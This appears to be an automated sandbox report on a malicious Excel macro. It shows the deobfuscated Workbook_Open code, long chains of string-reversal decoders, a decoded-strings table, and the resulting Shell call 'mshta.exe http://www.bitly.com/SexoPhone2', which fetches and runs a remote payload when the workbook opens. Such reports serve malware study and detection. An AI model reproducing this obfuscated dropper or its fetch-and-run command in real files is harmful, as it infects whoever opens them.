Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Shell	Shell("mshta.exe http://www.bitly.com/SexoPhone2") -> 1228

Strings	Decrypted Strings
"33"	"3"
"34"	"4"
"3737"	"77"
"3A33"	":3"
"34"	"4"
"36"	"6"
"393F"	"9?"
"3B47"	";G"
"35"	"5"
"36"	"6"
"393C"	"9<"
"3B4A"	";J"
"31"	"1"
"36"	"6"
"3845"	"8E"
"393F"	"9?"
"33"	"3"
"3635"	"65"
"37"	"7"
"3A373D3A3E483D3E"	":7=:>H=>"
"31"	"1"
"3334373938383743"	"3479887C"
"34"	"4"
"3737"	"77"
"34"	"4"
"38"	"8"
"3B3D"	";="
"3B3D374A3B3937383738"	";=7J;97878"
"37"	"7"
"39"	"9"
"3A3B"	":;"
"404B"	"@K"
"36"	"6"
"37"	"7"
"393F"	"9?"
"3A3E3E393D49"	":>>9=I"
"33"	"3"
"3635"	"65"
"39"	"9"
"403F404B3F4E3F3E3C39"	"@?@K?N?><9"
"36"	"6"
"393C"	"9<"
"3B3D"	";="
"36"	"6"
"38"	"8"
"393C"	"9<"
"3B3D"	";="
"34"	"4"
"37"	"7"
"373B"	"7;"
"3D4A3C483E3D3E4D"	"=J<H>=>M"
"33"	"3"
"3635"	"65"
"38"	"8"
"3E493D3A3F383F393B3C3E3F"	">I=:?8?9;<>?"

Line	Instruction	Meta Information
9	Sub Workbook_Open()
10	BlokE1 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3A33"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))))), StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("3737"))))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))))))	StrReverse("3:") -> :3 executed
11	BlokE2 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3B47"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))	StrReverse executed
12	BlokE3 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3B4A"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))	StrReverse executed
13	BlokE4 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3845"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))	StrReverse executed
14	BlokE5 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3A373D3A3E483D3E"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3635"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))))))))))	StrReverse executed
15	BlokE51 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3334373938383743"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))))), StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("3737"))))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))))))	StrReverse executed
16	BlokE52 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3B3D374A3B3937383738"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))), StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(StrReverse(QUj8uaqq5(GMpOmnDp4("3B3D"))))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))))))))	StrReverse executed
17	BlokE53 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("404B"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))))), StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3A3B"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))))))	StrReverse executed
18	BlokE54 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3A3E3E393D49"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))	StrReverse executed
19	BlokE55 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("403F404B3F4E3F3E3C39"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3635"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))))))))))	StrReverse executed
20	BlokE56 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(QUj8uaqq5(GMpOmnDp4("3B3D")))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))	StrReverse executed
21	BlokE57 = QhnsRALDv(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(StrReverse(QUj8uaqq5(GMpOmnDp4("3B3D"))))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))	StrReverse executed
22	BlokE6 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3D4A3C483E3D3E4D"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))))), StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("373B"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))))	StrReverse executed
23	BlokE61 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3E493D3A3F383F393B3C3E3F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("38"))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3635"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))))))))))	StrReverse executed
24	BlokE = BlokE1 + BlokE2 + BlokE3 + BlokE4 + BlokE5 + BlokE51 + BlokE52 + BlokE53 + BlokE53 + BlokE53 + BlokE54 + BlokE55 + BlokE56 + BlokE1 + BlokE57 + BlokE6 + BlokE61
25	Shell (BlokE)	Shell("mshta.exe http://www.bitly.com/SexoPhone2") -> 1228 executed
26	End Sub

Function DZfiJRzM5, APIs: 277, Strings: 74, Number of lines: 364, Relevance: 720.364

APIs	Meta Information
Len	Len("70") -> 2
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse	StrReverse("mEU]MnwtpY") -> YptwnM]UEm StrReverse("3") -> 3
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse	StrReverse("tz\|N\|jLgMk") -> kMgLj\|N\|zt StrReverse("4") -> 4
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse	StrReverse("wGrrQtm\|wy") -> yw\|mtQrrGw StrReverse("4") -> 4
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse	StrReverse("zPtJxmL") -> LmxJtPz StrReverse("5") -> 5
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
